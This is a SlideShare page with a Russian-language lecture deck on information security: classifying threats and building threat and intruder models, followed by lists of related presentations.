SlideShare ist ein Scribd-Unternehmen logo
1 von 40
Урок 5. Часть 1.
Построение модели угроз и нарушителя.
Информационная безопасность
организации
Лысяк Александр
http://inforsec.ru
Лаборатория информационной безопасности
Угроза
Угроза ИБ – совокупность условий и факторов,
создающих опасность для информации и/или
поддерживающей инфраструктуры.
Классификация:
 Активная угроза безопасности – угроза, связанная
с изменением состояния автоматизированной
системы.
 Пассивная угроза безопасности – угроза, не
связанная с изменением состояния
автоматизированной системы.
Классификация угроз
Зачем нужна классификация
 Позволяет сократить
количество
рассматриваемых
одновременно объектов
 Упорядочить процесс
рассмотрения объектов
 Выделить общие
характеристики
Основные элементы ИС
 Программные средства, применяемые при обработке
информации (ОС, СУБД, web-сервера и т.п.).
 Технические средства, осуществляющие обработку данных
 средства вычислительной техники;
 информационно-вычислительные комплексы и сети;
 средства и системы передачи, приема и обработки данных;
 средства и системы звукозаписи, звукоусиления,
звуковоспроизведения, переговорные и телевизионные
устройства, средства изготовления, тиражирования
документов и другие технические средства обработки
речевой, графической, видео- и буквенно-цифровой
информации).
 Совокупность информации и ее носителей, используемых в
ИС (данные в БД).
 Средства защиты информации.
 Вспомогательные технические средства и системы.
Классификационные признаки
 По виду нарушаемого свойства информации (виду
несанкционированных действий, осуществляемых
с данными).
 По видам возможных источников угроз.
 По виду защищаемой от угроз информации.
 По способу реализации угроз.
 По используемой уязвимости.
Виды угроз по нарушаемому свойству
 Угрозы конфиденциальности.
 Угрозы доступности:
техногенные, непреднамеренные
ошибки, пользовательская
сложность ИС, инсайдеры.
 Угрозы целостности:
фальсификация данных (в т.ч.
инсайдеры), нарушение
атомарности транзакций.
 Угрозы раскрытия параметров
защищенной компьютерной
системы: новые угрозы,
уязвимости, увеличение рисков.
Лаборатория информационной безопасности http://inforsec.ru
Классификация по виду носителя
 акустическая (речевая) информация (РИ), содержащаяся
непосредственно в произносимой речи пользователя ИС
при осуществлении им функции голосового ввода данных
в ИС, либо воспроизводимая акустическими средствами ИС
, а также содержащаяся в электромагнитных полях и
электрических сигналах, которые возникают за счет
преобразований акустической информации;
 видовая информация (ВИ), представленная в виде текста и
изображений различных устройств отображения
информации средств вычислительной техники,
информационно-вычислительных комплексов,
технических средств обработки графической, видео- и
буквенно-цифровой информации, входящих в состав ИС;
 информация, обрабатываемая (циркулирующая) в ИС, в
виде электрических, электромагнитных, оптических
сигналов;
 информация, обрабатываемая в ИС, представленная в виде
бит, байт, файлов и других логических структур.
Классификация по способу
реализации угроз
 Угрозы, связанные с НСД к
данным (атаки; внедрение
вредоносного ПО; повышение /
использование привилегий и т.д.);
 Угрозы утечки данных по
техническим каналам (ПЭМИН, …).
 Угрозы специальных воздействий
на ИС.
Классификация по используемой
уязвимости
 угрозы, реализуемые с использованием уязвимости
системного ПО;
 угрозы, реализуемые с использованием уязвимости
прикладного ПО;
 угрозы, реализуемые наличием в ИС аппаратной закладки;
 угрозы, реализуемые с использованием уязвимостей
протоколов сетевого взаимодействия и каналов передачи
данных;
 угрозы, возникающие в результате использования
уязвимости, вызванной недостатками организации ТЗИ от
НСД;
 угрозы, реализуемые с использованием уязвимостей,
обусловливающих наличие технических каналов утечки
информации;
 угрозы, реализуемые с использованием уязвимостей СЗИ.
Примеры угроз
 наблюдение за источниками информации;
 подслушивание конфиденциальных разговоров и акустических
сигналов;
 перехват электрических, виброакустических, магнитных и
электромагнитных полей и электрических сигналов излучений;
 несанкционированное распространение материальных
носителей за пределами организации;
 разглашение информации компетентными людьми;
 Утеря / кража носителей информации;
 несанкционированное распространение информации через
поля и электрические сигналы случайно возникшие в
аппаратуре;
 воздействие стихийных сил;
 сбои в аппаратуре или ПО;
 воздействие мощных электромагнитных и электрических
помех.
Источники угроз
 Внешние атаки.
 Инсайдерские атаки.
 Непреднамеренные ошибки.
 Отказ инфраструктуры.
 Внутренний отказ ИС.
 Юридические проблемы.
 Преднамеренные атаки
физического уровня.
Лаборатория информационной безопасности http://inforsec.ru
Классификация по источникам угроз
 Угрозы обусловленные
действиями субъекта
(антропогенные угрозы).
 Угрозы, обусловленные
техническими средствами
(техногенные угрозы).
 Угрозы, обусловленные
стихийными источниками
(стихийные угрозы).
Антропогенные угрозы
 Внешние:
1. Криминальные структуры.
2. Рецидивисты и
потенциальные
преступники.
3. Недобросовестные
партнёры.
4. Конкуренты.
5. Политические противники.
 Внутренние:
1. Персонал учреждения.
2. Персонал филиалов.
3. Специально внедрённые
агенты.
Техногенные угрозы
 Внутренние:
1. Некачественные технические, средства обработки
информации - некачественные программное
средства.
2. Некачественные программные средства обработки.
3. Вспомогательные средства.
4. Другие технические средства.
 Внешние:
1. Средства связи.
2. Близко расположенные опасные производства.
3. Сети инженерных коммуникаций (канализация,
энерго-, тепло и водоснабжение).
4. Транспорт.
Стихийные угрозы
 Пожары, молнии, включая
шаровые.
 Землетрясения.
 Ураганы.
 Наводнения.
 Другие форс-мажорные
обстоятельства.
 Различные непредвиденные
обстоятельства.
 Необъяснимые явления.
Спасибо за внимание!
Лаборатория информационной безопасности http://inforsec.ru
Урок 5. Часть 2.
Построение модели угроз и нарушителя.
Информационная безопасность
организации
Лысяк Александр
http://inforsec.ru
Лаборатория информационной безопасности
Идентификация угроз
 Необходимо идентифицировать опасности:
 Известные опасности.
 Неучтённые ранее опасности.
 Предварительная оценка (основывается на
анализе последствий и изучении причин).
 Предварительная оценка позволяет:
 Принять немедленные меры.
 Прекратить анализ из-за несущественности
опасности.
 Перейти к оценке рисков и угроз.
Условия реализации угрозы
 Угроза безопасности
реализуется в результате
образования канала
реализации угрозы между
источником угрозы и
носителем (источником)
защищаемых данных, что
создает условия для
нарушения безопасности
данных
(несанкционированный или
случайный доступ).
Основные элементы канала
 источник– субъект, материальный объект или физическое явление, создающие
угрозу;
 среда распространения, в которой физическое поле, сигнал, данные или
программы могут распространяться и воздействовать на защищаемые свойства;
 Носитель – физическое лицо или материальный объект, в том числе физическое
поле, в котором данные находят свое отражение в виде символов, образов,
сигналов, технических решений и процессов, количественных характеристик
физических величин.
Источник
угрозы
Среда распространения Носитель
данных
Уровни детализации
 Угрозы общего уровня.
Пример: нарушение доступности сайта интернет-
магазина.
 Угрозы общего технического уровня.
Пример: угроза реализации XSS-атаки; угроза
нарушения доступности хостинга.
 Угрозы детального технического уровня.
Пример: наличие уязвимости CVE в SharePoint
платформе; DDoS-атака на сервер хостинга /
ошибки персонала хостинга.
Компьютерная атака
 Целенаправленное
несанкционированное
воздействие на
информацию, на ресурс
автоматизированной
информационной системы
или получение
несанкционированного
доступа к ним с
применением программных
или программно-
аппаратных средств.
Виды атак
 Mailbombing
 Переполнение буфера
 Вирусы, троянские кони, почтовые черви,
снифферы, Rootkit-ы и другие специальные
программы
 Сетевая разведка
 Сниффинг пакетов
 IP-спуфинг
 Man-in-the-Middle
 Инъекция
 Социальная инженерия
 Отказ в обслуживании
Моделирование окружения
Модель угроз
Модели ИБ
Модель угроз
Систематизированный перечень угроз
безопасности при обработке информации в
информационных системах. Эти угрозы
обусловлены преднамеренными или
непреднамеренными действиями физических лиц,
действиями зарубежных спецслужб или
организаций (в том числе террористических), а
также криминальных группировок, создающих
условия для нарушения безопасности, которое
ведет к ущербу жизненно важных интересов
личности, общества и государства.
(ФСТЭК России)
Зачем нужно моделирование угроз
 Систематическая идентификация
потенциальных опасностей.
 Систематическая идентификация возможных
видов отказов.
 Количественные оценки или ранжирование
рисков.
 Выявление факторов, обуславливающих риск, и
слабых звеньев в системе.
 Более глубокое понимание устройства и
функционирования системы.
Зачем нужно моделирование угроз
 Сопоставление риска исследуемой системы с
рисками альтернативных систем или
технологий.
 Идентификация и сопоставление рисков и
неопределенностей.
 Возможность выбора мер и приемов по
обеспечению снижения риска.
 Основная задача моделирования окружения –
обоснование решений, касающихся рисков.
Вопросы для модели
 Какие угрозы могут быть реализованы?
 Как могут быть реализованы эти угрозы?
 С какой вероятностью могут быть реализованы
эти угрозы?
 Каков потенциальный ущерб от этих угроз?
 Каким образом могут быть реализованы эти
угрозы?
 Почему эти угрозы могут быть реализованы?
 На что могут быть направлены эти угрозы?
 Как можно отразить эти угрозы?
Как все устроено
Фактически мы
пытаемся описать
процесс
противодействия
нарушителю
используя наше
понимание
процесса.
Способы моделирования угроз
 Простой перечень и описание.
 Деревья угроз.
Дерево угроз
 Показывает условия реализации угроз.
 Комбинированный эффект и взаимосвязь
уязвимостей.
 Деревьев может быть много, в зависимости от
числа угроз общего уровня:
 Блокирование работы сервиса.
 Кража информации на р.с. пользователей.
 Несанкционированное изменение данных в БД.
 …
 Даёт оценку вероятности реализации угроз.
Дерево угроз
Моделирование окружения
Модель нарушителя.
Модель нарушителя.
Модель нарушителя определяет:
 категории (типы) нарушителей, которые могут
воздействовать на объект;
 цели, которые могут преследовать нарушители
каждой категории и их описание;
 типовые сценарии возможных действий
нарушителей, описывающие последовательность
(алгоритм) действий групп и отдельных
нарушителей, способы их действий на каждом этапе.
Классификация нарушителей
 Террористы и
террористические
организации.
 Конкурирующие организации и
структуры.
 Спецслужбы иностранных
государств и блоков государств.
 Криминальные структуры.
 Взломщики программных
продуктов ИТ, использующихся
в системах связи.
 Бывшие сотрудники
организаций связи.
 Недобросовестные сотрудники
и партнеры.
 Пользователи услугами связи и
др.
Классификация нарушителей.
Основные типы.
 Разработчик.
 Обслуживающий персонал
(системный
администратор,
сотрудники обеспечения
ИБ).
 Пользователи.
 Сторонние лица.
Мотивы нарушителей
 Месть.
 Достижение денежной
выгоды.
 Хулиганство и
любопытство.
 Профессиональное
самоутверждение.
Спасибо за внимание!
Лаборатория информационной безопасности http://inforsec.ru

Weitere ähnliche Inhalte

Was ist angesagt?

презентация на тему «защита информации»
презентация на тему «защита информации»презентация на тему «защита информации»
презентация на тему «защита информации»Yanatr
 
Как определить уровень защищенности ПДн?
Как определить уровень защищенности ПДн?Как определить уровень защищенности ПДн?
Как определить уровень защищенности ПДн?Cisco Russia
 
презентация по теме информационная безопасность
презентация по теме информационная безопасностьпрезентация по теме информационная безопасность
презентация по теме информационная безопасностьОля Гольцева
 
информационная безопасность
информационная безопасностьинформационная безопасность
информационная безопасностьtanya197517
 
защита информации 11 класс
защита информации 11 классзащита информации 11 класс
защита информации 11 классuset
 
Моделирование угроз сетевой инфраструктуры
Моделирование угроз сетевой инфраструктурыМоделирование угроз сетевой инфраструктуры
Моделирование угроз сетевой инфраструктурыAleksey Lukatskiy
 
7 cases of risk probality measurement
7 cases of risk probality measurement7 cases of risk probality measurement
7 cases of risk probality measurementAleksey Lukatskiy
 
Алгоритм действий оператора ПДн по созданию системы защиты ИСПДн
Алгоритм действий оператора ПДн по созданию системы защиты ИСПДнАлгоритм действий оператора ПДн по созданию системы защиты ИСПДн
Алгоритм действий оператора ПДн по созданию системы защиты ИСПДнSecurity Code Ltd.
 
Нюансы проведения аудита ИБ АСУ ТП
Нюансы проведения аудита ИБ АСУ ТПНюансы проведения аудита ИБ АСУ ТП
Нюансы проведения аудита ИБ АСУ ТПКомпания УЦСБ
 
Программа курса "Моделирование угроз"
Программа курса "Моделирование угроз"Программа курса "Моделирование угроз"
Программа курса "Моделирование угроз"Aleksey Lukatskiy
 
Защита информации Лекция 1
Защита информации Лекция 1Защита информации Лекция 1
Защита информации Лекция 1Kritsberg
 
Вычисление, визуализация и анализ метрик защищенности защищенности для монито...
Вычисление, визуализация и анализ метрик защищенности защищенности для монито...Вычисление, визуализация и анализ метрик защищенности защищенности для монито...
Вычисление, визуализация и анализ метрик защищенности защищенности для монито...Positive Hack Days
 
3. Первый. Сертифицированный. DATAPK
3. Первый. Сертифицированный. DATAPK3. Первый. Сертифицированный. DATAPK
3. Первый. Сертифицированный. DATAPKКомпания УЦСБ
 

Was ist angesagt? (19)

Threat Modeling (Part 4)
Threat Modeling (Part 4)Threat Modeling (Part 4)
Threat Modeling (Part 4)
 
презентация на тему «защита информации»
презентация на тему «защита информации»презентация на тему «защита информации»
презентация на тему «защита информации»
 
Журнал
ЖурналЖурнал
Журнал
 
Как определить уровень защищенности ПДн?
Как определить уровень защищенности ПДн?Как определить уровень защищенности ПДн?
Как определить уровень защищенности ПДн?
 
презентация по теме информационная безопасность
презентация по теме информационная безопасностьпрезентация по теме информационная безопасность
презентация по теме информационная безопасность
 
информационная безопасность
информационная безопасностьинформационная безопасность
информационная безопасность
 
защита информации 11 класс
защита информации 11 классзащита информации 11 класс
защита информации 11 класс
 
Моделирование угроз сетевой инфраструктуры
Моделирование угроз сетевой инфраструктурыМоделирование угроз сетевой инфраструктуры
Моделирование угроз сетевой инфраструктуры
 
7 cases of risk probality measurement
7 cases of risk probality measurement7 cases of risk probality measurement
7 cases of risk probality measurement
 
Алгоритм действий оператора ПДн по созданию системы защиты ИСПДн
Алгоритм действий оператора ПДн по созданию системы защиты ИСПДнАлгоритм действий оператора ПДн по созданию системы защиты ИСПДн
Алгоритм действий оператора ПДн по созданию системы защиты ИСПДн
 
Threat Modeling (Part 2)
Threat Modeling (Part 2)Threat Modeling (Part 2)
Threat Modeling (Part 2)
 
Нюансы проведения аудита ИБ АСУ ТП
Нюансы проведения аудита ИБ АСУ ТПНюансы проведения аудита ИБ АСУ ТП
Нюансы проведения аудита ИБ АСУ ТП
 
Программа курса "Моделирование угроз"
Программа курса "Моделирование угроз"Программа курса "Моделирование угроз"
Программа курса "Моделирование угроз"
 
Защита информации Лекция 1
Защита информации Лекция 1Защита информации Лекция 1
Защита информации Лекция 1
 
4. ePlat4m Security GRC
4. ePlat4m Security GRC4. ePlat4m Security GRC
4. ePlat4m Security GRC
 
Threat Modeling (Part 3)
Threat Modeling (Part 3)Threat Modeling (Part 3)
Threat Modeling (Part 3)
 
Вычисление, визуализация и анализ метрик защищенности защищенности для монито...
Вычисление, визуализация и анализ метрик защищенности защищенности для монито...Вычисление, визуализация и анализ метрик защищенности защищенности для монито...
Вычисление, визуализация и анализ метрик защищенности защищенности для монито...
 
3. Первый. Сертифицированный. DATAPK
3. Первый. Сертифицированный. DATAPK3. Первый. Сертифицированный. DATAPK
3. Первый. Сертифицированный. DATAPK
 
Threat Modeling (Part 1)
Threat Modeling (Part 1)Threat Modeling (Part 1)
Threat Modeling (Part 1)
 

Andere mochten auch

Лицензирование деятельности в области защиты информации
Лицензирование деятельности в области защиты информацииЛицензирование деятельности в области защиты информации
Лицензирование деятельности в области защиты информацииBulat Shamsutdinov
 
Моделирование угроз 2.0
Моделирование угроз 2.0Моделирование угроз 2.0
Моделирование угроз 2.0Aleksey Lukatskiy
 
Состояние сетевой безопасности в 2016 году
Состояние сетевой безопасности в 2016 году Состояние сетевой безопасности в 2016 году
Состояние сетевой безопасности в 2016 году Qrator Labs
 
БАРС Груп. Булат Шамсутдинов. "Практические вопросы обеспечения сетевой безоп...
БАРС Груп. Булат Шамсутдинов. "Практические вопросы обеспечения сетевой безоп...БАРС Груп. Булат Шамсутдинов. "Практические вопросы обеспечения сетевой безоп...
БАРС Груп. Булат Шамсутдинов. "Практические вопросы обеспечения сетевой безоп...Expolink
 
Курс по законодательству в области ИБ
Курс по законодательству в области ИБКурс по законодательству в области ИБ
Курс по законодательству в области ИБAleksey Lukatskiy
 

Andere mochten auch (7)

Лицензирование деятельности в области защиты информации
Лицензирование деятельности в области защиты информацииЛицензирование деятельности в области защиты информации
Лицензирование деятельности в области защиты информации
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
 
Моделирование угроз 2.0
Моделирование угроз 2.0Моделирование угроз 2.0
Моделирование угроз 2.0
 
Состояние сетевой безопасности в 2016 году
Состояние сетевой безопасности в 2016 году Состояние сетевой безопасности в 2016 году
Состояние сетевой безопасности в 2016 году
 
БАРС Груп. Булат Шамсутдинов. "Практические вопросы обеспечения сетевой безоп...
БАРС Груп. Булат Шамсутдинов. "Практические вопросы обеспечения сетевой безоп...БАРС Груп. Булат Шамсутдинов. "Практические вопросы обеспечения сетевой безоп...
БАРС Груп. Булат Шамсутдинов. "Практические вопросы обеспечения сетевой безоп...
 
Защита ГИС
Защита ГИСЗащита ГИС
Защита ГИС
 
Курс по законодательству в области ИБ
Курс по законодательству в области ИБКурс по законодательству в области ИБ
Курс по законодательству в области ИБ
 

Ähnlich wie Модель угроз и модель нарушителя. Основы.

Информационная безопасность
Информационная безопасностьИнформационная безопасность
Информационная безопасностьSainaVika
 
Dr web
Dr webDr web
Dr webBDA
 
Dr web
Dr webDr web
Dr webBDA
 
Dr web
Dr webDr web
Dr webBDA
 
Security of Information and Communication Systems
Security of Information and Communication SystemsSecurity of Information and Communication Systems
Security of Information and Communication SystemsSSA KPI
 
Inforomation security Basic presentation .pptx
Inforomation security Basic presentation .pptxInforomation security Basic presentation .pptx
Inforomation security Basic presentation .pptxamaqifeedback
 
Практика рассмотрения моделей угроз безопасности информации органов государст...
Практика рассмотрения моделей угроз безопасности информации органов государст...Практика рассмотрения моделей угроз безопасности информации органов государст...
Практика рассмотрения моделей угроз безопасности информации органов государст...journalrubezh
 
Информационная безопасность. Лекция 3.
Информационная безопасность. Лекция 3.Информационная безопасность. Лекция 3.
Информационная безопасность. Лекция 3.Александр Лысяк
 
дипломная презентация по инфорационной безопасности
дипломная презентация по инфорационной безопасностидипломная презентация по инфорационной безопасности
дипломная презентация по инфорационной безопасностиIvan Simanov
 
Anti-Malware. Илья Шабанов. "Тенденции по ИБ"
Anti-Malware. Илья Шабанов. "Тенденции по ИБ"Anti-Malware. Илья Шабанов. "Тенденции по ИБ"
Anti-Malware. Илья Шабанов. "Тенденции по ИБ"Expolink
 
Cовременные угрозы ИБ в корпоративной инфраструктуре и технологии противодейс...
Cовременные угрозы ИБ в корпоративной инфраструктуре и технологии противодейс...Cовременные угрозы ИБ в корпоративной инфраструктуре и технологии противодейс...
Cовременные угрозы ИБ в корпоративной инфраструктуре и технологии противодейс...IBS
 
e-conf2017_Долгинин_12102017.pdf
e-conf2017_Долгинин_12102017.pdfe-conf2017_Долгинин_12102017.pdf
e-conf2017_Долгинин_12102017.pdfalex183408
 
Проблемы при подключении к сетям общего пользования
Проблемы при подключении к сетям общего пользованияПроблемы при подключении к сетям общего пользования
Проблемы при подключении к сетям общего пользованияAlexander Dorofeev
 
Анализ уязвимостей корпоративных сетей
Анализ уязвимостей корпоративных сетейАнализ уязвимостей корпоративных сетей
Анализ уязвимостей корпоративных сетейSyssoftPO
 
Информационная безопасность
Информационная безопасностьИнформационная безопасность
Информационная безопасностьEvgeniya0352
 
Безопасная работа в cети Интернет. Самборская Л.Н.
Безопасная работа в cети Интернет. Самборская Л.Н.Безопасная работа в cети Интернет. Самборская Л.Н.
Безопасная работа в cети Интернет. Самборская Л.Н.TCenter500
 
Безопасность в Интернете
Безопасность в ИнтернетеБезопасность в Интернете
Безопасность в ИнтернетеMatevosyan Artur
 
Современные вирусные угрозы: тенденции развития и методы борьбы
Современные вирусные угрозы: тенденции развития и методы борьбыСовременные вирусные угрозы: тенденции развития и методы борьбы
Современные вирусные угрозы: тенденции развития и методы борьбыalterbass
 
Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Dmitry Evteev
 
Безопасность и защита информации.
Безопасность и защита информации.Безопасность и защита информации.
Безопасность и защита информации.maripet012
 

Ähnlich wie Модель угроз и модель нарушителя. Основы. (20)

Информационная безопасность
Информационная безопасностьИнформационная безопасность
Информационная безопасность
 
Dr web
Dr webDr web
Dr web
 
Dr web
Dr webDr web
Dr web
 
Dr web
Dr webDr web
Dr web
 
Security of Information and Communication Systems
Security of Information and Communication SystemsSecurity of Information and Communication Systems
Security of Information and Communication Systems
 
Inforomation security Basic presentation .pptx
Inforomation security Basic presentation .pptxInforomation security Basic presentation .pptx
Inforomation security Basic presentation .pptx
 
Практика рассмотрения моделей угроз безопасности информации органов государст...
Практика рассмотрения моделей угроз безопасности информации органов государст...Практика рассмотрения моделей угроз безопасности информации органов государст...
Практика рассмотрения моделей угроз безопасности информации органов государст...
 
Информационная безопасность. Лекция 3.
Информационная безопасность. Лекция 3.Информационная безопасность. Лекция 3.
Информационная безопасность. Лекция 3.
 
дипломная презентация по инфорационной безопасности
дипломная презентация по инфорационной безопасностидипломная презентация по инфорационной безопасности
дипломная презентация по инфорационной безопасности
 
Anti-Malware. Илья Шабанов. "Тенденции по ИБ"
Anti-Malware. Илья Шабанов. "Тенденции по ИБ"Anti-Malware. Илья Шабанов. "Тенденции по ИБ"
Anti-Malware. Илья Шабанов. "Тенденции по ИБ"
 
Cовременные угрозы ИБ в корпоративной инфраструктуре и технологии противодейс...
Cовременные угрозы ИБ в корпоративной инфраструктуре и технологии противодейс...Cовременные угрозы ИБ в корпоративной инфраструктуре и технологии противодейс...
Cовременные угрозы ИБ в корпоративной инфраструктуре и технологии противодейс...
 
e-conf2017_Долгинин_12102017.pdf
e-conf2017_Долгинин_12102017.pdfe-conf2017_Долгинин_12102017.pdf
e-conf2017_Долгинин_12102017.pdf
 
Проблемы при подключении к сетям общего пользования
Проблемы при подключении к сетям общего пользованияПроблемы при подключении к сетям общего пользования
Проблемы при подключении к сетям общего пользования
 
Анализ уязвимостей корпоративных сетей
Анализ уязвимостей корпоративных сетейАнализ уязвимостей корпоративных сетей
Анализ уязвимостей корпоративных сетей
 
Информационная безопасность
Информационная безопасностьИнформационная безопасность
Информационная безопасность
 
Безопасная работа в cети Интернет. Самборская Л.Н.
Безопасная работа в cети Интернет. Самборская Л.Н.Безопасная работа в cети Интернет. Самборская Л.Н.
Безопасная работа в cети Интернет. Самборская Л.Н.
 
Безопасность в Интернете
Безопасность в ИнтернетеБезопасность в Интернете
Безопасность в Интернете
 
Современные вирусные угрозы: тенденции развития и методы борьбы
Современные вирусные угрозы: тенденции развития и методы борьбыСовременные вирусные угрозы: тенденции развития и методы борьбы
Современные вирусные угрозы: тенденции развития и методы борьбы
 
Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Реальные опасности виртуального мира.
Реальные опасности виртуального мира.
 
Безопасность и защита информации.
Безопасность и защита информации.Безопасность и защита информации.
Безопасность и защита информации.
 

Mehr von Александр Лысяк

Создание сайтов: как всё устроено и первые шаги.
Создание сайтов: как всё устроено и первые шаги.Создание сайтов: как всё устроено и первые шаги.
Создание сайтов: как всё устроено и первые шаги.Александр Лысяк
 
Как создать сайт с нуля за 1 день
Как создать сайт с нуля за 1 деньКак создать сайт с нуля за 1 день
Как создать сайт с нуля за 1 деньАлександр Лысяк
 
Что такое SEO: полноценный план продвижения сайта.
Что такое SEO: полноценный план продвижения сайта.Что такое SEO: полноценный план продвижения сайта.
Что такое SEO: полноценный план продвижения сайта.Александр Лысяк
 
Информационная безопасность. Лекция 1. Основы ИБ и принципы построения СОИБ.
Информационная безопасность. Лекция 1. Основы ИБ и принципы построения СОИБ.Информационная безопасность. Лекция 1. Основы ИБ и принципы построения СОИБ.
Информационная безопасность. Лекция 1. Основы ИБ и принципы построения СОИБ.Александр Лысяк
 
Информационная безопасность. Лекция 6.
Информационная безопасность. Лекция 6.Информационная безопасность. Лекция 6.
Информационная безопасность. Лекция 6.Александр Лысяк
 
Информационная безопасность. Лекция 4.
Информационная безопасность. Лекция 4.Информационная безопасность. Лекция 4.
Информационная безопасность. Лекция 4.Александр Лысяк
 
Информационная безопасность. Лекция 5.
Информационная безопасность. Лекция 5.Информационная безопасность. Лекция 5.
Информационная безопасность. Лекция 5.Александр Лысяк
 
Информационная безопасность. Лекция 2.
Информационная безопасность. Лекция 2.Информационная безопасность. Лекция 2.
Информационная безопасность. Лекция 2.Александр Лысяк
 

Mehr von Александр Лысяк (8)

Создание сайтов: как всё устроено и первые шаги.
Создание сайтов: как всё устроено и первые шаги.Создание сайтов: как всё устроено и первые шаги.
Создание сайтов: как всё устроено и первые шаги.
 
Как создать сайт с нуля за 1 день
Как создать сайт с нуля за 1 деньКак создать сайт с нуля за 1 день
Как создать сайт с нуля за 1 день
 
Что такое SEO: полноценный план продвижения сайта.
Что такое SEO: полноценный план продвижения сайта.Что такое SEO: полноценный план продвижения сайта.
Что такое SEO: полноценный план продвижения сайта.
 
Информационная безопасность. Лекция 1. Основы ИБ и принципы построения СОИБ.
Информационная безопасность. Лекция 1. Основы ИБ и принципы построения СОИБ.Информационная безопасность. Лекция 1. Основы ИБ и принципы построения СОИБ.
Информационная безопасность. Лекция 1. Основы ИБ и принципы построения СОИБ.
 
Информационная безопасность. Лекция 6.
Информационная безопасность. Лекция 6.Информационная безопасность. Лекция 6.
Информационная безопасность. Лекция 6.
 
Информационная безопасность. Лекция 4.
Информационная безопасность. Лекция 4.Информационная безопасность. Лекция 4.
Информационная безопасность. Лекция 4.
 
Информационная безопасность. Лекция 5.
Информационная безопасность. Лекция 5.Информационная безопасность. Лекция 5.
Информационная безопасность. Лекция 5.
 
Информационная безопасность. Лекция 2.
Информационная безопасность. Лекция 2.Информационная безопасность. Лекция 2.
Информационная безопасность. Лекция 2.
 

Модель угроз и модель нарушителя. Основы.

  • 1. Урок 5. Часть 1. Построение модели угроз и нарушителя. Информационная безопасность организации Лысяк Александр http://inforsec.ru Лаборатория информационной безопасности
  • 2. Угроза Угроза ИБ – совокупность условий и факторов, создающих опасность для информации и/или поддерживающей инфраструктуры. Классификация:  Активная угроза безопасности – угроза, связанная с изменением состояния автоматизированной системы.  Пассивная угроза безопасности – угроза, не связанная с изменением состояния автоматизированной системы.
  • 4. Зачем нужна классификация  Позволяет сократить количество рассматриваемых одновременно объектов  Упорядочить процесс рассмотрения объектов  Выделить общие характеристики
  • 5. Основные элементы ИС  Программные средства, применяемые при обработке информации (ОС, СУБД, web-сервера и т.п.).  Технические средства, осуществляющие обработку данных  средства вычислительной техники;  информационно-вычислительные комплексы и сети;  средства и системы передачи, приема и обработки данных;  средства и системы звукозаписи, звукоусиления, звуковоспроизведения, переговорные и телевизионные устройства, средства изготовления, тиражирования документов и другие технические средства обработки речевой, графической, видео- и буквенно-цифровой информации).  Совокупность информации и ее носителей, используемых в ИС (данные в БД).  Средства защиты информации.  Вспомогательные технические средства и системы.
  • 6. Классификационные признаки  По виду нарушаемого свойства информации (виду несанкционированных действий, осуществляемых с данными).  По видам возможных источников угроз.  По виду защищаемой от угроз информации.  По способу реализации угроз.  По используемой уязвимости.
  • 7. Виды угроз по нарушаемому свойству  Угрозы конфиденциальности.  Угрозы доступности: техногенные, непреднамеренные ошибки, пользовательская сложность ИС, инсайдеры.  Угрозы целостности: фальсификация данных (в т.ч. инсайдеры), нарушение атомарности транзакций.  Угрозы раскрытия параметров защищенной компьютерной системы: новые угрозы, уязвимости, увеличение рисков. Лаборатория информационной безопасности http://inforsec.ru
  • 8. Классификация по виду носителя  акустическая (речевая) информация (РИ), содержащаяся непосредственно в произносимой речи пользователя ИС при осуществлении им функции голосового ввода данных в ИС, либо воспроизводимая акустическими средствами ИС , а также содержащаяся в электромагнитных полях и электрических сигналах, которые возникают за счет преобразований акустической информации;  видовая информация (ВИ), представленная в виде текста и изображений различных устройств отображения информации средств вычислительной техники, информационно-вычислительных комплексов, технических средств обработки графической, видео- и буквенно-цифровой информации, входящих в состав ИС;  информация, обрабатываемая (циркулирующая) в ИС, в виде электрических, электромагнитных, оптических сигналов;  информация, обрабатываемая в ИС, представленная в виде бит, байт, файлов и других логических структур.
  • 9. Классификация по способу реализации угроз  Угрозы, связанные с НСД к данным (атаки; внедрение вредоносного ПО; повышение / использование привилегий и т.д.);  Угрозы утечки данных по техническим каналам (ПЭМИН, …).  Угрозы специальных воздействий на ИС.
  • 10. Классификация по используемой уязвимости  угрозы, реализуемые с использованием уязвимости системного ПО;  угрозы, реализуемые с использованием уязвимости прикладного ПО;  угрозы, реализуемые наличием в ИС аппаратной закладки;  угрозы, реализуемые с использованием уязвимостей протоколов сетевого взаимодействия и каналов передачи данных;  угрозы, возникающие в результате использования уязвимости, вызванной недостатками организации ТЗИ от НСД;  угрозы, реализуемые с использованием уязвимостей, обусловливающих наличие технических каналов утечки информации;  угрозы, реализуемые с использованием уязвимостей СЗИ.
  • 11. Примеры угроз  наблюдение за источниками информации;  подслушивание конфиденциальных разговоров и акустических сигналов;  перехват электрических, виброакустических, магнитных и электромагнитных полей и электрических сигналов излучений;  несанкционированное распространение материальных носителей за пределами организации;  разглашение информации компетентными людьми;  Утеря / кража носителей информации;  несанкционированное распространение информации через поля и электрические сигналы случайно возникшие в аппаратуре;  воздействие стихийных сил;  сбои в аппаратуре или ПО;  воздействие мощных электромагнитных и электрических помех.
  • 12. Источники угроз  Внешние атаки.  Инсайдерские атаки.  Непреднамеренные ошибки.  Отказ инфраструктуры.  Внутренний отказ ИС.  Юридические проблемы.  Преднамеренные атаки физического уровня. Лаборатория информационной безопасности http://inforsec.ru
  • 13. Классификация по источникам угроз  Угрозы обусловленные действиями субъекта (антропогенные угрозы).  Угрозы, обусловленные техническими средствами (техногенные угрозы).  Угрозы, обусловленные стихийными источниками (стихийные угрозы).
  • 14. Антропогенные угрозы  Внешние: 1. Криминальные структуры. 2. Рецидивисты и потенциальные преступники. 3. Недобросовестные партнёры. 4. Конкуренты. 5. Политические противники.  Внутренние: 1. Персонал учреждения. 2. Персонал филиалов. 3. Специально внедрённые агенты.
  • 15. Техногенные угрозы  Внутренние: 1. Некачественные технические, средства обработки информации - некачественные программное средства. 2. Некачественные программные средства обработки. 3. Вспомогательные средства. 4. Другие технические средства.  Внешние: 1. Средства связи. 2. Близко расположенные опасные производства. 3. Сети инженерных коммуникаций (канализация, энерго-, тепло и водоснабжение). 4. Транспорт.
  • 16. Стихийные угрозы  Пожары, молнии, включая шаровые.  Землетрясения.  Ураганы.  Наводнения.  Другие форс-мажорные обстоятельства.  Различные непредвиденные обстоятельства.  Необъяснимые явления.
  • 17. Спасибо за внимание! Лаборатория информационной безопасности http://inforsec.ru
